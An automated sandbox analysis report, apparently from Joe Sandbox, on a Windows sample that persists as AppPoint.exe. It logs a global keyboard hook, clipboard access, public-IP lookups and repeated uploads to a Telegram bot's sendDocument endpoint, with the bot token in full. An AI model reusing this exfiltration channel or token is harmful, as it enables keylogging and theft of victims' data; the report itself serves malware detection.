Source: global traffic	HTTP traffic detected: POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd31730b64b168Host: api.telegram.orgContent-Length: 4052Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd31651b67dcddHost: api.telegram.orgContent-Length: 971Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd31773f9649d9Host: api.telegram.orgContent-Length: 4052Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd3c8c32eff476Host: api.telegram.orgContent-Length: 57790Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd3ed3a6c23472Host: api.telegram.orgContent-Length: 57790Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd499b60c8d6e1Host: api.telegram.orgContent-Length: 933Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd49a0fe4f34f0Host: api.telegram.orgContent-Length: 57790Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd47ab88a365e6Host: api.telegram.orgContent-Length: 57790Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd49981eeebc2cHost: api.telegram.orgContent-Length: 57790Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd4d89ba7fba6aHost: api.telegram.orgContent-Length: 57790Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd4999ecacb492Host: api.telegram.orgContent-Length: 57790Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd54c9da928959Host: api.telegram.orgContent-Length: 57803Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd5645c8bf490eHost: api.telegram.orgContent-Length: 57803Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd5eb8e9bf401eHost: api.telegram.orgContent-Length: 57803Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd642c1739cacaHost: api.telegram.orgContent-Length: 57831Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd6e4c8b4b6429Host: api.telegram.orgContent-Length: 57807Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd70b23c932623Host: api.telegram.orgContent-Length: 57807Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd73460fc7b16dHost: api.telegram.orgContent-Length: 58021Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd66ec79bef7a9Host: api.telegram.orgContent-Length: 59713Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd6a2d3fc84416Host: api.telegram.orgContent-Length: 57807Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd6f6cb7f3d97cHost: api.telegram.orgContent-Length: 57807Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd3165a0197d79Host: api.telegram.orgContent-Length: 57807Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd3165a0256939Host: api.telegram.orgContent-Length: 57807Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd3165a0387c77Host: api.telegram.orgContent-Length: 57807Expect: 100-continueConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 104.26.13.205 104.26.13.205
Source: Joe Sandbox View	IP Address: 104.26.13.205 104.26.13.205

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: unknown

HTTP traffic detected: POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd31650ef647f0Host: api.telegram.orgContent-Length: 971Expect: 100-continueConnection: Keep-Alive

Source: IUqsn1SBGy.exe, 00000005.00000002.4520429982.0000000002D95000.00000004.00000800.00020000.00000000.sdmp, IUqsn1SBGy.exe, 00000005.00000002.4520429982.0000000002C7F000.00000004.00000800.00020000.00000000.sdmp, IUqsn1SBGy.exe, 00000005.00000002.4520429982.0000000002C0B000.00000004.00000800.00020000.00000000.sdmp, IUqsn1SBGy.exe, 00000005.00000002.4520429982.0000000002CF3000.00000004.00000800.00020000.00000000.sdmp, IUqsn1SBGy.exe, 00000005.00000002.4520429982.0000000002C0F000.00000004.00000800.00020000.00000000.sdmp, IUqsn1SBGy.exe, 00000005.00000002.4520429982.0000000002C4B000.00000004.00000800.00020000.00000000.sdmp, IUqsn1SBGy.exe, 00000005.00000002.4520429982.0000000002CC3000.00000004.00000800.00020000.00000000.sdmp, AppPoint.exe, 0000000A.00000002.4520276581.0000000002AD9000.00000004.00000800.00020000.00000000.sdmp, AppPoint.exe, 0000000A.00000002.4520276581.00000000029FF000.00000004.00000800.00020000.00000000.sdmp, AppPoint.exe, 0000000A.00000002.4520276581.0000000002A3B000.00000004.00000800.00020000.00000000.sdmp, AppPoint.exe, 0000000A.00000002.4520276581.00000000029FB000.00000004.00000800.00020000.00000000.sdmp, AppPoint.exe, 0000000A.00000002.4520276581.0000000002BF7000.00000004.00000800.00020000.00000000.sdmp, AppPoint.exe, 0000000A.00000002.4520276581.0000000002A55000.00000004.00000800.00020000.00000000.sdmp, AppPoint.exe, 0000000C.00000002.4521384104.0000000002B25000.00000004.00000800.00020000.00000000.sdmp, AppPoint.exe, 0000000C.00000002.4521384104.0000000002ACF000.00000004.00000800.00020000.00000000.sdmp, AppPoint.exe, 0000000C.00000002.4521384104.0000000002BB7000.00000004.00000800.00020000.00000000.sdmp, AppPoint.exe, 0000000C.00000002.4521384104.0000000002B0B000.00000004.00000800.00020000.00000000.sdmp, AppPoint.exe, 0000000C.00000002.4521384104.0000000002CA4000.00000004.00000800.00020000.00000000.sdmp, AppPoint.exe, 0000000C.00000002.4521384104.0000000002ACB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: IUqsn1SBGy.exe, 00000005.00000002.4520429982.0000000002CF3000.00000004.00000800.00020000.00000000.sdmp, IUqsn1SBGy.exe, 00000005.00000002.4520429982.0000000002CC3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.orgh
Source: IUqsn1SBGy.exe, AppPoint.exe.5.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: IUqsn1SBGy.exe, AppPoint.exe.5.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: IUqsn1SBGy.exe, AppPoint.exe.5.dr	String found in binary or memory: http://ocsp.comodoca.com0
Source: IUqsn1SBGy.exe, 00000000.00000002.2121820572.0000000003341000.00000004.00000800.00020000.00000000.sdmp, IUqsn1SBGy.exe, 00000005.00000002.4520429982.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, AppPoint.exe, 00000008.00000002.2274943867.00000000027F9000.00000004.00000800.00020000.00000000.sdmp, AppPoint.exe, 0000000A.00000002.4520276581.0000000002971000.00000004.00000800.00020000.00000000.sdmp, AppPoint.exe, 0000000B.00000002.2349359823.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp, AppPoint.exe, 0000000C.00000002.4521384104.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: IUqsn1SBGy.exe, 00000005.00000002.4520429982.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, AppPoint.exe, 0000000A.00000002.4520276581.0000000002971000.00000004.00000800.00020000.00000000.sdmp, AppPoint.exe, 0000000C.00000002.4521384104.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org
Source: IUqsn1SBGy.exe, 00000005.00000002.4520429982.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, AppPoint.exe, 0000000A.00000002.4520276581.0000000002971000.00000004.00000800.00020000.00000000.sdmp, AppPoint.exe, 0000000C.00000002.4521384104.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/
Source: IUqsn1SBGy.exe, 00000005.00000002.4520429982.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, AppPoint.exe, 0000000A.00000002.4520276581.0000000002971000.00000004.00000800.00020000.00000000.sdmp, AppPoint.exe, 0000000C.00000002.4521384104.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/t
Source: IUqsn1SBGy.exe, AppPoint.exe.5.dr	String found in binary or memory: https://api.libertyreserve.com/beta/xml/
Source: AppPoint.exe, 0000000B.00000002.2349359823.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp, IUqsn1SBGy.exe, AppPoint.exe.5.dr	String found in binary or memory: https://api.libertyreserve.com/beta/xml/accountname.aspx
Source: AppPoint.exe, 0000000B.00000002.2349359823.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp, IUqsn1SBGy.exe, AppPoint.exe.5.dr	String found in binary or memory: https://api.libertyreserve.com/beta/xml/balance.aspx
Source: IUqsn1SBGy.exe, AppPoint.exe.5.dr	String found in binary or memory: https://api.libertyreserve.com/beta/xml/history.aspx
Source: AppPoint.exe, 0000000B.00000002.2349359823.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.libertyreserve.com/beta/xml/history.aspxS
Source: AppPoint.exe, 0000000B.00000002.2349359823.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp, IUqsn1SBGy.exe, AppPoint.exe.5.dr	String found in binary or memory: https://api.libertyreserve.com/beta/xml/transfer.aspx
Source: IUqsn1SBGy.exe, 00000005.00000002.4520429982.0000000002D95000.00000004.00000800.00020000.00000000.sdmp, IUqsn1SBGy.exe, 00000005.00000002.4520429982.0000000002C7F000.00000004.00000800.00020000.00000000.sdmp, IUqsn1SBGy.exe, 00000005.00000002.4520429982.0000000002C0B000.00000004.00000800.00020000.00000000.sdmp, IUqsn1SBGy.exe, 00000005.00000002.4520429982.0000000002CF3000.00000004.00000800.00020000.00000000.sdmp, IUqsn1SBGy.exe, 00000005.00000002.4520429982.0000000002C4B000.00000004.00000800.00020000.00000000.sdmp, AppPoint.exe, 0000000A.00000002.4520276581.0000000002AD9000.00000004.00000800.00020000.00000000.sdmp, AppPoint.exe, 0000000A.00000002.4520276581.0000000002A3B000.00000004.00000800.00020000.00000000.sdmp, AppPoint.exe, 0000000A.00000002.4520276581.00000000029FB000.00000004.00000800.00020000.00000000.sdmp, AppPoint.exe, 0000000A.00000002.4520276581.0000000002A9A000.00000004.00000800.00020000.00000000.sdmp, AppPoint.exe, 0000000A.00000002.4520276581.0000000002BF7000.00000004.00000800.00020000.00000000.sdmp, AppPoint.exe, 0000000A.00000002.4520276581.0000000002A55000.00000004.00000800.00020000.00000000.sdmp, AppPoint.exe, 0000000C.00000002.4521384104.0000000002B7D000.00000004.00000800.00020000.00000000.sdmp, AppPoint.exe, 0000000C.00000002.4521384104.0000000002B25000.00000004.00000800.00020000.00000000.sdmp, AppPoint.exe, 0000000C.00000002.4521384104.0000000002BB7000.00000004.00000800.00020000.00000000.sdmp, AppPoint.exe, 0000000C.00000002.4521384104.0000000002B0B000.00000004.00000800.00020000.00000000.sdmp, AppPoint.exe, 0000000C.00000002.4521384104.0000000002CA4000.00000004.00000800.00020000.00000000.sdmp, AppPoint.exe, 0000000C.00000002.4521384104.0000000002ACB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: IUqsn1SBGy.exe, 00000005.00000002.4520429982.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, AppPoint.exe, 0000000A.00000002.4520276581.0000000002971000.00000004.00000800.00020000.00000000.sdmp, AppPoint.exe, 0000000C.00000002.4521384104.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/
Source: IUqsn1SBGy.exe, 00000005.00000002.4520429982.0000000002D95000.00000004.00000800.00020000.00000000.sdmp, IUqsn1SBGy.exe, 00000005.00000002.4520429982.0000000002C7F000.00000004.00000800.00020000.00000000.sdmp, IUqsn1SBGy.exe, 00000005.00000002.4520429982.0000000002C0B000.00000004.00000800.00020000.00000000.sdmp, IUqsn1SBGy.exe, 00000005.00000002.4520429982.0000000002CF3000.00000004.00000800.00020000.00000000.sdmp, IUqsn1SBGy.exe, 00000005.00000002.4520429982.0000000002C4B000.00000004.00000800.00020000.00000000.sdmp, AppPoint.exe, 0000000A.00000002.4520276581.0000000002AD9000.00000004.00000800.00020000.00000000.sdmp, AppPoint.exe, 0000000A.00000002.4520276581.0000000002A3B000.00000004.00000800.00020000.00000000.sdmp, AppPoint.exe, 0000000A.00000002.4520276581.00000000029FB000.00000004.00000800.00020000.00000000.sdmp, AppPoint.exe, 0000000A.00000002.4520276581.0000000002A9A000.00000004.00000800.00020000.00000000.sdmp, AppPoint.exe, 0000000A.00000002.4520276581.0000000002BF7000.00000004.00000800.00020000.00000000.sdmp, AppPoint.exe, 0000000A.00000002.4520276581.0000000002A55000.00000004.00000800.00020000.00000000.sdmp, AppPoint.exe, 0000000C.00000002.4521384104.0000000002B7D000.00000004.00000800.00020000.00000000.sdmp, AppPoint.exe, 0000000C.00000002.4521384104.0000000002B25000.00000004.00000800.00020000.00000000.sdmp, AppPoint.exe, 0000000C.00000002.4521384104.0000000002BB7000.00000004.00000800.00020000.00000000.sdmp, AppPoint.exe, 0000000C.00000002.4521384104.0000000002B0B000.00000004.00000800.00020000.00000000.sdmp, AppPoint.exe, 0000000C.00000002.4521384104.0000000002CA4000.00000004.00000800.00020000.00000000.sdmp, AppPoint.exe, 0000000C.00000002.4521384104.0000000002ACB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument
Source: IUqsn1SBGy.exe, AppPoint.exe.5.dr	String found in binary or memory: https://sci.libertyreserve.com/
Source: IUqsn1SBGy.exe, AppPoint.exe.5.dr	String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49997 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50013 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 50007 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50010
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50012
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50011
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50014
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50013
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50003 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49996 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50010 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50008 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50014 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50000 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50004 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49999 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49995 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50009 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50011 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50001 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50005 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49992 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49999
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49998
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49997
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50007
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49996
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50006
Source: unknown	Network traffic detected: HTTP traffic on port 50012 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49995
Source: unknown	Network traffic detected: HTTP traffic on port 49998 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50009
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49994
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50008
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49993
Source: unknown	Network traffic detected: HTTP traffic on port 49994 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49992
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50001
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50000
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50003
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50002
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50005
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50004
Source: unknown	Network traffic detected: HTTP traffic on port 50002 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50006 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 49993 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443

Source: unknown	HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49751 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49792 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49798 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50001 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50003 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\IUqsn1SBGy.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe

Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Window created: window name: CLIPBRDWNDCLASS

Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 0_2_01770F68	0_2_01770F68
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 0_2_01770960	0_2_01770960
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 0_2_01770927	0_2_01770927
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 0_2_01770995	0_2_01770995
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 0_2_01770B33	0_2_01770B33
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 0_2_01770BE1	0_2_01770BE1
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 0_2_01770B9E	0_2_01770B9E
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 0_2_01770A31	0_2_01770A31
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 0_2_01770ADD	0_2_01770ADD
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 0_2_01770AAA	0_2_01770AAA
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 0_2_01770D40	0_2_01770D40
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 0_2_01770D14	0_2_01770D14
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 0_2_01770DFC	0_2_01770DFC
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 0_2_01770D97	0_2_01770D97
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 0_2_01770C5D	0_2_01770C5D
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 0_2_01772C20	0_2_01772C20
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 0_2_01770C15	0_2_01770C15
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 0_2_01772C10	0_2_01772C10
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 0_2_01770C95	0_2_01770C95
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 0_2_01770E7B	0_2_01770E7B
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 0_2_09E30B90	0_2_09E30B90
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 0_2_09E32CF8	0_2_09E32CF8
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 0_2_09E37F60	0_2_09E37F60
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 0_2_09E31E78	0_2_09E31E78
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 0_2_09E332A0	0_2_09E332A0
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 0_2_09E39589	0_2_09E39589
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 0_2_09E31440	0_2_09E31440
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 0_2_09E38960	0_2_09E38960
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 0_2_09E38950	0_2_09E38950
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 0_2_09E318D8	0_2_09E318D8
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 0_2_09E338A0	0_2_09E338A0
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 0_2_09E33BC8	0_2_09E33BC8
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 0_2_09E33BD8	0_2_09E33BD8
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 0_2_09E30B78	0_2_09E30B78
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 0_2_09E34DE0	0_2_09E34DE0
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 0_2_09E34DDD	0_2_09E34DDD
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 0_2_09E38D11	0_2_09E38D11
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 0_2_09E32CE8	0_2_09E32CE8
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 0_2_09E34FE8	0_2_09E34FE8
